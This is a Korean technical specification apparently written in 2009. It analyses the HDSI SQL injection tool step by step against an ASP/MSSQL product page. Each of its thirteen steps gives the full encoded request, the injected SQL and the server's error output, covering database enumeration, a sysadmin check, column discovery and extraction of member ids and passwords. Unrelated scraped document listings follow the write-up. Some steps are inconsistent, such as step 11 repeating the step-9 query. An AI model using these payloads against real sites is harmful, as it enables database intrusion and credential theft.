문서 템플릿
|
|
- 준기 최
- 5 years ago
- Views:
Transcription
1 HDSI 툴분석 [sql injection 기술명세서 ] Sql injection 기술명세서 Ver 이문서는 sql injection 기술명세가범위입니다. Copyrights Copyright 2009 by CanvasTeam@SpeeDroot( 장경칩 ) All Rights Reserved. 장경칩의사전승인없이본내용의전부또는일부에대한복사, 전재, 배포, 사용을금합니다. Mail: ox1111@hackersnews.org
2 개정이력 버전 수정일자 재 / 개정이력설명 작성자 승인자 초안작성 장경칩 장경칩 Filed type가져오기수정및오타수정 장경칩 장경칩
3 - 목차 - [sql injection 기술명세서 ]... 1 Sql injection 기술명세서... 1 Ver Copyrights 개요 목적 범위 정의및약어 관련문서 제약사항 HDSI 툴분석 encode 분석 취약한코드 단계별공격방법 단계별공격분석 A-HDSI-01 ( 실제공격가능한지테스트해본다. ) A-HDSI-02 ( 공격시사용될 db 테이블생성 ) A-HDSI-03 ( db name 가져온다 ) A-HDSI-04 ( SA 계정확인 ) A-HDSI-05 ( 프로시저생성 ) A-HDSI-06 ( DB 테이블개수가져오기 ) A-HDSI-07 ( 순서대로 DB 테이블이름가져오기 ) A-HDSI-08 ( 지정테이블의필드개수가져오기 ) A-HDSI-09 ( 지정테이블의필드이름가져오기 ) A-HDSI-10 ( 지정테이블의필드 TYPE 가져오기 ) A-HDSI-10 ( 레코드개수를가져온다 ) A-HDSI-11 ( 레코드값가져오기 ) A-HDSI-12 ( 사용한테이블삭제 ) 표목차 - 표 1. 정의및약어기술 그림목차 -
4 1. 개요 1.1. 목적 이문서는기존문서가많이있지만내나름대로정리하는데의의가있고 HDSI 사용명세와 SQL INJECTION 를기술적접근을명세화시키는고향후 SQL INJECTION TOOL 를만드는데그목적이있다 1.2. 범위 HDSI 툴의사용명세와 SQL INECTION 의기술적접근이범위이다 정의및약어 용어 설명 표 1. 정의및약어기술 1.4. 관련문서 1.5. 제약사항 N/A
5 2. HDSI 툴분석 2.1. encode 분석 Encode 코드 $20 space Char(94) ^ Char(85) U %2B + Decode 코드 2.2. 취약한코드 ID = Request.QueryString("ID") strsql= "SELECT * FROM products WHERE product_id=" & ID & ";"
6 2.3. 단계별공격방법 STEP CODE 설명 1 A-HDSI-01 실제공격가능여부와 USER를값을가져온다. 2 A-HDSI-02 공격시사용할 DB 테이블을생성한다. 3 A-HDSI-03 DB NAME를가져온다. 4 A-HDSI-04 SA 계정인지확인. 5 A-HDSI-05 프로시져생성 6 A-HDSI-06 DB 테이블개수가져오기 7 A-HDSI-07 순서대로 DB테이블이름가져오기 8 A-HDSI-08 테이블의필드개수가져오기 9 A-HDSI-09 테이블의필드이름가져오기 10 A-HDSI-10 필드 TYPE가져오기 11 A-HDSI-11 레코드개수가져오기 12 A-HDSI-12 레코드의값가져오기 13 A-HDSI-13 사용한테이블삭제
7 2.4. 단계별공격분석 A-HDSI-01 ( 실제공격가능한지테스트해본다. ) GET /priamos/product.asp?id=1%20and(char(94)%2buser%2bchar(94))>0 ID=1%20and(char(94)%2Buser%2Bchar(94))>0 ID=1 and(^+user+^)>0 1) User > 0 를한이유는 user 컬럼은문자열타입이므로 > 0 를하게된다면 0 이숫자이므로 error 유발하게된다 Error 를유발해서 user 값이 error 페이지에보일수있게한다. 2) (^+user+^) 한이유는 asp 에서 error 페이지를보내줄때파싱이용이하게하기위해넣었다. StrSQL 문자열 Ticket number 를포함한명령 strsql= "SELECT * FROM products WHERE product_id=" & 1 and(char(94)+user+char(94))>0 & ";" SELECT * FROM products WHERE product_id=1 and(char(94)+user+char(94))>0; Microsoft OLE DB Provider for ODBC Drivers 오류 '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '^dbo^' to a column of data type int. /priamos/product.asp, 줄 66 [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '^^dbo^' to a column of data type int.
8 A-HDSI-02 ( 공격시사용될 db 테이블생성 ) HEAD /priamos/product.asp?id=1;create%20table%20t_jiaozhu(jiaozhu%20varchar(200)) ID=1;create%20table%20t_jiaozhu(jiaozhu%20varchar(200)) ID=1;create table t_jiaozhu(jiaozhu varchar(200)) 1) t_jiaozhu 라는 db 테이블생성 2) jiaozhu 컬럼생성 StrSQL 문자열 strsql= "SELECT * FROM products WHERE product_id=" & 1 ;create table t_jiaozhu(jiaozhu varchar(200)) & ";" SELECT * FROM products WHERE product_id=1;create table t_jiaozhu(jiaozhu varchar(200));
9 A-HDSI-03 ( db name 가져온다 ) GET /priamos/product.asp?id=1%20and(char(94)%2bdb_name()%2bchar(94))>0 ID=1%20and(char(94)%2Bdb_name()%2Bchar(94))>0 ID=1 and(^+db_name()+^)>0 1) db_name() 는 db 이름을가져온다 StrSQL 문자열실제 SQL TEST strsql= "SELECT * FROM products WHERE product_id=" & 1 and(char(94)+db_name()+char(94))>0 & ";" SELECT * FROM products WHERE product_id=1 and(char(94)+db_name()+char(94))>0; SELECT 'database' = DB_NAME(), 'user' = USER_NAME(), 'login' = SUSER_NAME() [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '^PRIAMOS^' to a column of data type int.
10 A-HDSI-04 ( SA 계정확인 ) ID=1%20And%20(char(94)%2Bcast(IS_SRVROLEMEMBER('sysadmin')%20as%20varchar(1))%2Bchar(94))>0 GET /priamos/product.asp?id=1%20and%20(char(94)%2bcast(is_srvrolemember('sysadmin')%20as%20varchar(1))%2bchar(94))>0 ID=1%20And%20(char(94)%2Bcast(IS_SRVROLEMEMBER('sysadmin')%20as%20varchar(1))%2Bchar(94))>0 ID=1 And (^+cast(is_srvrolemember('sysadmin') as varchar(1))+^)>0 1) SA 계정인지확인한다. 1 이리턴되면 SA 계정이다. StrSQL 문자열실제 SQL문테스트 strsql= "SELECT * FROM products WHERE product_id=" & 1 And (char(94)+cast(is_srvrolemember('sysadmin') as varchar(1))+char(94))>0 & ";" SELECT * FROM products WHERE product_id=1 And (char(94)+cast(is_srvrolemember('sysadmin') as varchar(1))+char(94))>0; SELECT IS_SRVROLEMEMBER('sysadmin') as varchar [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '^1^' to a column of data type int.
11 A-HDSI-05 ( 프로시저생성 ) HEAD /priamos/product.asp?id=1;declare%20@a%20int-- ID=1;declare%20@a%20int-- int 1) StrSQL 문자열실제 SQL문테스트 strsql= "SELECT * FROM products WHERE product_id=" & int & ";" SELECT * FROM products WHERE int--;
12 A-HDSI-06 ( DB 테이블개수가져오기 ) ID=1%20And%20(select%20char(94)%2Bcast(count(1)%20as%20varchar(80))%2Bchar(94)%20from%20[PRIAMOS]..[sysobjects]%20 where%20xtype=char(85))=0 GET /priamos/product.asp? ID=1%20And%20(select%20char(94)%2Bcast(count(1)%20as%20varchar(80))%2Bchar(94)%20from%20[PRIAMOS]..[sysobjects]%20 where%20xtype=char(85))=0 ID=1%20And%20(select%20char(94)%2Bcast(count(1)%20as%20varchar(80))%2Bchar(94)%20from%20[PRIAMOS]..[sysobjects]%20 where%20xtype=char(85))=0 ID=1 And (select ^+cast(count(1) as varchar(80))+^ from [PRIAMOS]..[sysobjects] Where xtype=u)=0 1) DB 테이블개수가져오기 StrSQL 문자열실제 SQL문테스트 strsql= "SELECT * FROM products WHERE product_id=" & 1 And (select char(94)+cast(count(1) as varchar(80))+char(94) from [PRIAMOS]..[sysobjects] where xtype=char(85))=0 & ";" SELECT * FROM products WHERE product_id=1 And (select char(94)+cast(count(1) as varchar(80))+char(94) from [PRIAMOS]..[sysobjects] where xtype=char(85))=0; [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '^8^' to a column of data type int.
13 A-HDSI-07 ( 순서대로 DB 테이블이름가져오기 ) ID=1%20And%20(Select%20Top%201%20cast(char(94)%2Bname%2Bchar(94)%20as%20varchar(8000))%20from (Select%20Top%201%20id,name%20from%20[PRIAMOS]..[sysobjects]%20 Where%20xtype=char(85)%20order%20by%20name%20asc,id%20desc)%20T%20order%20by%20name%20desc,id%20asc)>0 GET /priamos/product.asp? ID=1%20And%20(Select%20Top%201%20cast(char(94)%2Bname%2Bchar(94)%20as%20varchar(8000))%20 from(select%20top%201%20id,name%20from%20[priamos]..[sysobjects]%20 Where%20xtype=char(85)%20order%20by%20name%20asc,id%20desc)%20T%20order%20by%20name%20desc,id%20asc)>0 ID=1%20And%20(Select%20Top%201%20cast(char(94)%2Bname%2Bchar(94)%20as%20varchar(8000))%20 from(select%20top%201%20id,name%20from%20[priamos]..[sysobjects]%20 Where%20xtype=char(85)%20order%20by%20name%20asc,id%20desc)%20T%20order%20by%20name%20desc,id%20asc)>0 ID=1 And (Select Top 1 cast(^+name+^ as varchar(8000)) from(select Top 1 id,name from [PRIAMOS]..[sysobjects] Where xtype=u order by name asc,id desc) T order by name desc,id asc)>0 1) 순서대로 DB 테이블개수가져오기 2) from(select Top 1 ~ from(select Top 4 까지요청한다. StrSQL 문자열실제 SQL문테스트 strsql= "SELECT * FROM products WHERE product_id=" & 1 And (Select Top 1 cast(char(94)+name+char(94) as varchar(8000)) from(select Top 1 id,name from [PRIAMOS]..[sysobjects] Where xtype=char(85) order by name asc,id desc) T order by name desc,id asc)> & ";" SELECT * FROM products WHERE product_id=1 And (Select Top 1 cast(char(94)+name+char(94) as varchar(8000)) from(select Top 1 id,name from [PRIAMOS]..[sysobjects] Where xtype=char(85) order by name asc,id desc) T order by name desc,id asc)>0; [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '^D99_CMD^' to a column of data type int.
14 A-HDSI-08 ( 지정테이블의필드개수가져오기 ) ID=1%20And%20(select%20char(94)%2Bcast(count(1)%20as%20varchar(80))%2Bchar(94)%20 from%20[priamos]..[syscolumns]%20a,[priamos]..[sysobjects]%20b%20 where%20a.id=b.id%20and%20b.name='member')>0 GET /priamos/product.asp? ID=1%20And%20(select%20char(94)%2Bcast(count(1)%20as%20varchar(80))%2Bchar(94)%20 from%20[priamos]..[syscolumns]%20a,[priamos]..[sysobjects]%20b%20 where%20a.id=b.id%20and%20b.name='member')>0 ID=1%20And%20(select%20char(94)%2Bcast(count(1)%20as%20varchar(80))%2Bchar(94)%20 from%20[priamos]..[syscolumns]%20a,[priamos]..[sysobjects]%20b%20 where%20a.id=b.id%20and%20b.name='member')>0 ID=1 And (select ^ +cast(count(1) as varchar(80)) + ^ from [PRIAMOS]..[syscolumns] A,[PRIAMOS]..[sysobjects] B where A.id=B.id and B.name='member')>0 지정테이블의필드개수가져오기 1) [member] 이부분을계속변경해서필드개수를구한다.. StrSQL 문자열실제 SQL문테스트 strsql= "SELECT * FROM products WHERE product_id=" & 1 And (select char(94)+cast(count(1) as varchar(80))+char(94) from [PRIAMOS]..[syscolumns] A,[PRIAMOS]..[sysobjects] B where A.id=B.id and B.name='member')>0 & ";" SELECT * FROM products WHERE product_id=1 And (select char(94)+cast(count(1) as varchar(80))+char(94) from [PRIAMOS]..[syscolumns] A,[PRIAMOS]..[sysobjects] B where A.id=B.id and B.name='member')>0; [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '^2^' to a column of data type int.
15 A-HDSI-09 ( 지정테이블의필드이름가져오기 ) 멤버테이블에서필드이름 (id) 을가져온다. ID=1%20And%20(select%20Top%201%20cast(char(94)%2Bname%2Bchar(94)%20as%20varchar(80))%20 from(select%20top%201%20b.name%20from%20[priamos]..[sysobjects]%20a%20,[priamos]..[syscolumns]%20b%20 where%20a.id=b.id%20and%20a.name='member'%20order%20by%20b.name%20asc)%20t%20order%20by%20name%20desc)>0 GET /priamos/product.asp? ID=1%20And%20(select%20Top%201%20cast(char(94)%2Bname%2Bchar(94)%20as%20varchar(80))%20 from(select%20top%201%20b.name%20from%20[priamos]..[sysobjects]%20a%20,[priamos]..[syscolumns]%20b%20 where%20a.id=b.id%20and%20a.name='member'%20order%20by%20b.name%20asc)%20t%20order%20by%20name%20desc)>0 ID=1%20And%20(select%20Top%201%20cast(char(94)%2Bname%2Bchar(94)%20as%20varchar(80))%20 from(select%20top%201%20b.name%20from%20[priamos]..[sysobjects]%20a%20,[priamos]..[syscolumns]%20b%20 where%20a.id=b.id%20and%20a.name='member'%20order%20by%20b.name%20asc)%20t%20order%20by%20name%20desc)>0 ID=1 And (select Top 1 cast( ^ +name + ^ as varchar(80)) from(select Top 1 B.name from [PRIAMOS]..[sysobjects] A,[PRIAMOS]..[syscolumns] B where A.id=B.id and A.name='member' order by B.name asc) T order by name desc)>0 1. 지정테이블의필드이름가져오기 2. from(select top 1 ~ from(select top2 를변경하면서데이터를가져온다 ( 필드개수는 3.3.8참조 ) 3. member 를변경하면서각테이블의필드이름을가져온다. StrSQL 문자열 실제 SQL 문테스트 strsql= "SELECT * FROM products WHERE product_id=" & 1 And (select Top 1 cast(char(94)+name+char(94) as varchar(80)) from(select Top 1 B.name from [PRIAMOS]..[sysobjects] A,[PRIAMOS]..[syscolumns] B where A.id=B.id and A.name='member' order by B.name asc) T order by name desc)>0 & ";" SELECT * FROM products WHERE product_id=1 And (select Top 1 cast(char(94)+name+char(94) as varchar(80)) from(select Top 1 B.name from [PRIAMOS]..[sysobjects] A,[PRIAMOS]..[syscolumns] B where A.id=B.id and A.name='member' order by B.name asc) T order by name desc)>0; [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '^id^' to a column of data type int.
16 멤버테이블에서필드이름 (passwd) 을가져온다. (select%20top%201%20cast(char(94)%2bname%2bchar(94)%20as%20varchar(80))%20 from(select%20top%202%20b.name%20from%20[priamos]..[sysobjects]%20a%20,[priamos]..[syscolumns]%20b%20 where%20a.id=b.id%20and%20a.name='member'%20order%20by%20b.name%20asc)%20t%20order%20by%20name%20desc)>0 GET /priamos/product.asp?id=1%20and%20(select%20top%201%20cast(char(94)%2bname%2bchar(94)%20as%20varchar(80))%20 from(select%20top%202%20b.name%20from%20[priamos]..[sysobjects]%20a%20,[priamos]..[syscolumns]%20b%20 where%20a.id=b.id%20and%20a.name='member'%20order%20by%20b.name%20asc)%20t%20order%20by%20name%20desc)>0 ID=1%20And%20(select%20Top%201%20cast(char(94)%2Bname%2Bchar(94)%20as%20varchar(80))%20 from(select%20top%202%20b.name%20from%20[priamos]..[sysobjects]%20a%20,[priamos]..[syscolumns]%20b%20 where%20a.id=b.id%20and%20a.name='member'%20order%20by%20b.name%20asc)%20t%20order%20by%20name%20desc)>0 ID=1 And (select Top 1 cast( ^ +name + ^ as varchar(80)) from(select Top 2 B.name from [PRIAMOS]..[sysobjects] A,[PRIAMOS]..[syscolumns] B where A.id=B.id and A.name='member' order by B.name asc) T order by name desc)>0 1. 지정테이블의필드이름가져오기 2. from(select top 1 ~ from(select top2 를변경하면서데이터를가져온다 ( 필드개수는 3.3.8참조 ) 3. member 를변경하면서각테이블의필드이름을가져온다. StrSQL 문자열 실제 SQL 문테스트 strsql= "SELECT * FROM products WHERE product_id=" & 1 And (select Top 1 cast(char(94)+name+char(94) as varchar(80)) from(select Top 2 B.name from [PRIAMOS]..[sysobjects] A,[PRIAMOS]..[syscolumns] B where A.id=B.id and A.name='member' order by B.name asc) T order by name desc)>0 & ";" SELECT * FROM products WHERE product_id=1 And (select Top 1 cast(char(94)+name+char(94) as varchar(80)) from(select Top 2 B.name from [PRIAMOS]..[sysobjects] A,[PRIAMOS]..[syscolumns] B where A.id=B.id and A.name='member' order by B.name asc) T order by name desc)>0; [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '^passwd^' to a column of data type int.
17 A-HDSI-10 ( 지정테이블의필드 TYPE 가져오기 ) ID=1%20And%20(select%20Top%201%20char(94)%2Bcast(B.xtype%20as%20varchar(80))%2Bchar(94)%20from%20[PRIAMOS].. [sysobjects]%20a,[priamos]..[syscolumns]%20b%20where%20a.id=b.id%20and%20a.name='member'%20and%20b.name='id')>0 GET /priamos/product.asp? ID=1%20And%20(select%20Top%201%20char(94)%2Bcast(B.xtype%20as%20varchar(80))%2Bchar(94)%20from%20[PRIAMOS].. [sysobjects]%20a,[priamos]..[syscolumns]%20b%20where%20a.id=b.id%20and%20a.name='member'%20and%20b.name='id')>0 ID=1%20And%20(select%20Top%201%20char(94)%2Bcast(B.xtype%20as%20varchar(80))%2Bchar(94)%20from%20[PRIAMOS].. [sysobjects]%20a,[priamos]..[syscolumns]%20b%20where%20a.id=b.id%20and%20a.name='member'%20and%20b.name='id')>0 ID=1 And (select Top 1 ^+cast(b.xtype as varchar(80))+^ from [PRIAMOS].. [sysobjects] A,[PRIAMOS]..[syscolumns] B where A.id=B.id and A.name='member' and B.name='id')>0 필드의 type 를가져온다 StrSQL 문자열실제 SQL문테스트 필드 type 분석 strsql= "SELECT * FROM products WHERE product_id=" & 1 And (select Top 1 char(94)+cast(b.xtype as varchar(80))+char(94) from [PRIAMOS]..[sysobjects] A,[PRIAMOS]..[syscolumns] B where A.id=B.id and A.name='member' and B.name='id')>0 & ";" SELECT * FROM products WHERE product_id=1 And (select Top 1 char(94)+cast(b.xtype as varchar(80))+char(94) from [PRIAMOS]..[sysobjects] A,[PRIAMOS]..[syscolumns] B where A.id=B.id and A.name='member' and B.name='id')>0; [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '^175^' to a column of data type int. 175 : char 56 : int 35 :text, 167 : varcharr 239 :nchar 231: nvarchar
18 A-HDSI-10 ( 레코드개수를가져온다 ) ID=1%20And%20(Select%20char(94)%2BCast(Count(1)%20as%20varchar(8000))%2Bchar(94)%20From%20[PRIAMOS]..[member]%20 Where%201=1)>0 GET /priamos/product.asp? ID=1%20And%20(Select%20char(94)%2BCast(Count(1)%20as%20varchar(8000))%2Bchar(94)%20From%20[PRIAMOS]..[member]%20 Where%201=1)>0 ID=1%20And%20(Select%20char(94)%2BCast(Count(1)%20as%20varchar(8000))%2Bchar(94)%20From%20[PRIAMOS]..[member]%20 Where%201=1)>0 ID=1 And (Select ^ +Cast(Count(1) as varchar(8000)) + ^ From [PRIAMOS]..[member] Where 1=1)>0 레코드개수가져온다. 1) [member] 이부분을계속변경해서레코드개수를구한다.. StrSQL 문자열실제 SQL문테스트 strsql= "SELECT * FROM products WHERE product_id=" & 1 And (Select char(94)+cast(count(1) as varchar(8000))+char(94) From [PRIAMOS]..[member] Where 1=1)>0 & ";" SELECT * FROM products WHERE product_id=1 And (Select char(94)+cast(count(1) as varchar(8000))+char(94) From [PRIAMOS]..[member] Where 1=1)>0; [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '^3^' to a column of data type int.
19 A-HDSI-11 ( 레코드값가져오기 ) ID=1And%20(select%20top%201%20char(94)%2Bcast(id%20as%20varchar(8000))%2Bchar(94)%20%20 from%20(%20select%20top%202%20id,passwd%20from%20[priamos]..[member]%20order%20by%20id%20desc,passwd%20asc%20)%20 as%20as_tablename%20order%20by%20id%20asc,passwd%20desc%20)>0 GET /priamos/product.asp?id=1and%20(select%20top%201%20char(94)%2bcast(id%20as%20varchar(8000))%2bchar(94)%20%20 from%20(%20select%20top%202%20id,passwd%20from%20[priamos]..[member]%20order%20by%20id%20desc,passwd%20asc%20)%20 as%20as_tablename%20order%20by%20id%20asc,passwd%20desc%20)>0 ID=1And%20(select%20top%201%20char(94)%2Bcast(id%20as%20varchar(8000))%2Bchar(94)%20%20 from%20(%20select%20top%202%20id,passwd%20from%20[priamos]..[member]%20order%20by%20id%20desc,passwd%20asc%20)%20 as%20as_tablename%20order%20by%20id%20asc,passwd%20desc%20)>0 ID=1 And (select top 1 ^ +cast(id as varchar(8000)) + ^ from ( select top 2 id,passwd from [PRIAMOS]..[member] order by id desc,passwd asc ) as as_tablename order by id asc,passwd desc )>0 1. 레코드값가져오기 2. from(select top 1 ~ from(select top3 를변경하면서데이터를가져온다 ( 레코드개수는 참조 ) 3. member 를변경하면서각레코드값을가져온다. 4. 레코드값 (id) 을가져온다면위와같이필드이름 (id, passwd) 변경해서레코드값을가져온다. StrSQL 문자열 실제 SQL 문테스트 strsql= "SELECT * FROM products WHERE product_id=" & 1 And (select Top 1 cast( ^ +name + ^ as varchar(80)) from(select Top 1 B.name from [PRIAMOS]..[sysobjects] A,[PRIAMOS]..[syscolumns] B where A.id=B.id and A.name='member' order by B.name asc) T order by name desc)>0 & ";" ID=1 And (select Top 1 cast( ^ +name + ^ as varchar(80)) from(select Top 1 B.name from [PRIAMOS]..[sysobjects] A,[PRIAMOS]..[syscolumns] B where A.id=B.id and A.name='member' order by B.name asc) T order by name desc)>0 [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '^root ^' to a column of data type int.
20 A-HDSI-12 ( 사용한테이블삭제 ) * HDSI 에없는내용이지만추가한항목임. table t_jiaozhu GET /priamos/product.asp?id=1;drop table t_jiaozhu ID=1;drop table t_jiaozhu ID=1;drop table t_jiaozhu 1) 사용한테이블삭제 StrSQL 문자열 strsql= "SELECT * FROM products WHERE product_id=" & 1 ;drop table t_jiaozhu & ";" SELECT * FROM products WHERE product_id=1;drop table t_jiaozhu;
SKINFOSEC-CHR-028-ASP Mssql Cookie Sql Injection Tool 분석 보고서.doc
Asp Mssql Sql Injection Tool 분석보고서 이재곤 (x0saver@gmail.com) SK Infosec Co., Inc MSS 사업본부 / 침해대응센터모의해킹파트 Table of Contents 1. 개요... 3 2. 구성... 3 3. 분석... 4 3.1. 기능분석... 4 4. 공격원리...14 4.1 기본공격원리...14 4.2
More informationMicrosoft PowerPoint - 10Àå.ppt
10 장. DB 서버구축및운영 DBMS 의개념과용어를익힌다. 간단한 SQL 문법을학습한다. MySQL 서버를설치 / 운영한다. 관련용어 데이터 : 자료 테이블 : 데이터를표형식으로표현 레코드 : 테이블의행 필드또는컬럼 : 테이블의열 필드명 : 각필드의이름 데이터타입 : 각필드에입력할값의형식 학번이름주소연락처 관련용어 DB : 테이블의집합 DBMS : DB 들을관리하는소프트웨어
More information10.ppt
: SQL. SQL Plus. JDBC. SQL >> SQL create table : CREATE TABLE ( ( ), ( ),.. ) SQL >> SQL create table : id username dept birth email id username dept birth email CREATE TABLE member ( id NUMBER NOT NULL
More informationPowerPoint 프레젠테이션
MySQL - 명령어 1. 데이터베이스관련명령 2. 데이터베이스테이블관련명령 3. SQL 명령의일괄실행 4. 레코드관련명령 5. 데이터베이스백업및복원명령 1. 데이터베이스관련명령 데이터베이스접속명령 데이터베이스접속명령 mysql -u계정 -p비밀번호데이터베이스명 C: > mysql -ukdhong p1234 kdhong_db 데이터베이스생성명령 데이터베이스생성명령
More information강의 개요
DDL TABLE 을만들자 웹데이터베이스 TABLE 자료가저장되는공간 문자자료의경우 DB 생성시지정한 Character Set 대로저장 Table 생성시 Table 의구조를결정짓는열속성지정 열 (Clumn, Attribute) 은이름과자료형을갖는다. 자료형 : http://dev.mysql.cm/dc/refman/5.1/en/data-types.html TABLE
More informationDBMS & SQL Server Installation Database Laboratory
DBMS & 조교 _ 최윤영 } 데이터베이스연구실 (1314 호 ) } 문의사항은 cyy@hallym.ac.kr } 과제제출은 dbcyy1@gmail.com } 수업공지사항및자료는모두홈페이지에서확인 } dblab.hallym.ac.kr } 홈페이지 ID: 학번 } 홈페이지 PW:s123 2 차례 } } 설치전점검사항 } 설치단계별설명 3 Hallym Univ.
More informationMySQL-.. 1
MySQL- 기초 1 Jinseog Kim Dongguk University jinseog.kim@gmail.com 2017-08-25 Jinseog Kim Dongguk University jinseog.kim@gmail.com MySQL-기초 1 2017-08-25 1 / 18 SQL의 기초 SQL은 아래의 용도로 구성됨 데이터정의 언어(Data definition
More information13주-14주proc.PDF
12 : Pro*C/C++ 1 2 Embeded SQL 3 PRO *C 31 C/C++ PRO *C NOT! NOT AND && AND OR OR EQUAL == = SQL,,, Embeded SQL SQL 32 Pro*C C SQL Pro*C C, C Pro*C, C C 321, C char : char[n] : n int, short, long : float
More information5장 SQL 언어 Part II
5 장 SQL 언어 Part II 박창이 서울시립대학교통계학과 박창이 ( 서울시립대학교통계학과 ) 5 장 SQL 언어 Part II 1 / 26 데이터조작문 데이터검색 : SELECT 문데이터추가 : INSERT 문데이터수정 : UPDATE 문데이터삭제 : DELETE 문 박창이 ( 서울시립대학교통계학과 ) 5 장 SQL 언어 Part II 2 / 26 SELECT
More information윈도우시스템프로그래밍
데이터베이스및설계 MySQL 을위한 MFC 를사용한 ODBC 프로그래밍 2012.05.10. 오병우 컴퓨터공학과금오공과대학교 http://www.apmsetup.com 또는 http://www.mysql.com APM Setup 설치발표자료참조 Department of Computer Engineering 2 DB 에속한테이블보기 show tables; 에러발생
More information빅데이터분산컴퓨팅-5-수정
Apache Hive 빅데이터분산컴퓨팅 박영택 Apache Hive 개요 Apache Hive 는 MapReduce 기반의 High-level abstraction HiveQL은 SQL-like 언어를사용 Hadoop 클러스터에서 MapReduce 잡을생성함 Facebook 에서데이터웨어하우스를위해개발되었음 현재는오픈소스인 Apache 프로젝트 Hive 유저를위한
More informationMicrosoft PowerPoint Python-DB
순천향대학교컴퓨터공학과이상정 순천향대학교컴퓨터공학과 1 학습내용 데이터베이스 SQLite 데이터베이스 파이썬과데이터베이스연결 순천향대학교컴퓨터공학과 2 데이터베이스 (Database) 소개 데이터베이스 DBMS (DataBase Management System) 이라고도함 대용량의데이터를매우효율적으로처리하고저장하는기술 SQLite, 오라클, MySQL 등이있음
More information씨에이에스는 서울특별시 시설관리공단 계약 제1579호(2005.7.25) 장애인 콜택시 콜센터 차량관제시스템 구축사업 감리용역 에 근거하여 카나스 에서 수행중인 장애인콜택시 콜센터 차량관제시스템 구축사업에 대한 최종감리를 실시하고 본 보고서를 제출합니다. 2005.11
관리 번호 씨에이에스 감리 2005-102호 서울특별시 시설관리공단 장애인콜택시 콜센터 차량관제시스템 구축사업 최종감리 보고서 2005 년 11 월 씨에이에스 씨에이에스는 서울특별시 시설관리공단 계약 제1579호(2005.7.25) 장애인 콜택시 콜센터 차량관제시스템 구축사업 감리용역 에 근거하여 카나스 에서 수행중인 장애인콜택시 콜센터 차량관제시스템 구축사업에
More informationMicrosoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc
분석보고서 이동현 (dhclub20@naver.com) SK Infosec Co., Inc MSS 사업본부침해대응팀모의해킹파트 Table of Contents 1. 개요... 3 1.1. 배경... 3 1.2. 목적... 3 2. 공격분석... 4 2.1. Cookie Injection... 4 2.2. Cookie Injection의발생원인... 5 2.3.
More informationMySQL-Ch10
10 Chapter.,,.,, MySQL. MySQL mysqld MySQL.,. MySQL. MySQL....,.,..,,.,. UNIX, MySQL. mysqladm mysqlgrp. MySQL 608 MySQL(2/e) Chapter 10 MySQL. 10.1 (,, ). UNIX MySQL, /usr/local/mysql/var, /usr/local/mysql/data,
More information5-03-Â÷¼¼´ëÀ¥Iš
141 142 Ver. 2011 143 144 Ver. 2011 145 146 Ver. 2011 147 148 Ver. 2011 149 150 Ver. 2011 151 152 Ver. 2011 153 154 Ver. 2011 155 156 Ver. 2011 157 158 Ver. 2011 159 160 Ver. 2011 161 162 Ver. 2011 163
More information목차 BUG offline replicator 에서유효하지않은로그를읽을경우비정상종료할수있다... 3 BUG 각 partition 이서로다른 tablespace 를가지고, column type 이 CLOB 이며, 해당 table 을 truncate
ALTIBASE HDB 6.1.1.5.6 Patch Notes 목차 BUG-39240 offline replicator 에서유효하지않은로그를읽을경우비정상종료할수있다... 3 BUG-41443 각 partition 이서로다른 tablespace 를가지고, column type 이 CLOB 이며, 해당 table 을 truncate 한뒤, hash partition
More informationTITLE
CSED421 Database Systems Lab MySQL Basic Syntax SQL DML & DDL Data Manipulation Language SELECT UPDATE DELETE INSERT INTO Data Definition Language CREATE DATABASE ALTER DATABASE CREATE TABLE ALTER TABLE
More informationTablespace On-Offline 테이블스페이스 온라인/오프라인
2018/11/10 12:06 1/2 Tablespace On-Offline 테이블스페이스온라인 / 오프라인 목차 Tablespace On-Offline 테이블스페이스온라인 / 오프라인... 1 일반테이블스페이스 (TABLESPACE)... 1 일반테이블스페이스생성하기... 1 테이블스페이스조회하기... 1 테이블스페이스에데이터파일 (DATA FILE) 추가
More information8 장데이터베이스 8.1 기본개념 - 데이터베이스 : 데이터를조직적으로구조화한집합 (cf. 엑셀파일 ) - 테이블 : 데이터의기록형식 (cf. 엑셀시트의첫줄 ) - 필드 : 같은종류의데이터 (cf. 엑셀시트의각칸 ) - 레코드 : 데이터내용 (cf. 엑셀시트의한줄 )
8 장데이터베이스 8.1 기본개념 - 데이터베이스 : 데이터를조직적으로구조화한집합 (cf. 엑셀파일 ) - 테이블 : 데이터의기록형식 (cf. 엑셀시트의첫줄 ) - 필드 : 같은종류의데이터 (cf. 엑셀시트의각칸 ) - 레코드 : 데이터내용 (cf. 엑셀시트의한줄 ) - DDL(Data Definition Language) : show, create, drop
More information목차 BUG 문법에맞지않는질의문수행시, 에러메시지에질의문의일부만보여주는문제를수정합니다... 3 BUG ROUND, TRUNC 함수에서 DATE 포맷 IW 를추가지원합니다... 5 BUG ROLLUP/CUBE 절을포함하는질의는 SUBQUE
ALTIBASE HDB 6.3.1.10.1 Patch Notes 목차 BUG-45710 문법에맞지않는질의문수행시, 에러메시지에질의문의일부만보여주는문제를수정합니다... 3 BUG-45730 ROUND, TRUNC 함수에서 DATE 포맷 IW 를추가지원합니다... 5 BUG-45760 ROLLUP/CUBE 절을포함하는질의는 SUBQUERY REMOVAL 변환을수행하지않도록수정합니다....
More informationI T C o t e n s P r o v i d e r h t t p : / / w w w. h a n b i t b o o k. c o. k r
I T C o t e n s P r o v i d e r h t t p : / / w w w. h a n b i t b o o k. c o. k r -------------------------------------------------------------------- -- 1. : ts_cre_bonsa.sql -- 2. :
More information*금안1512-01-도비라및목차1~9
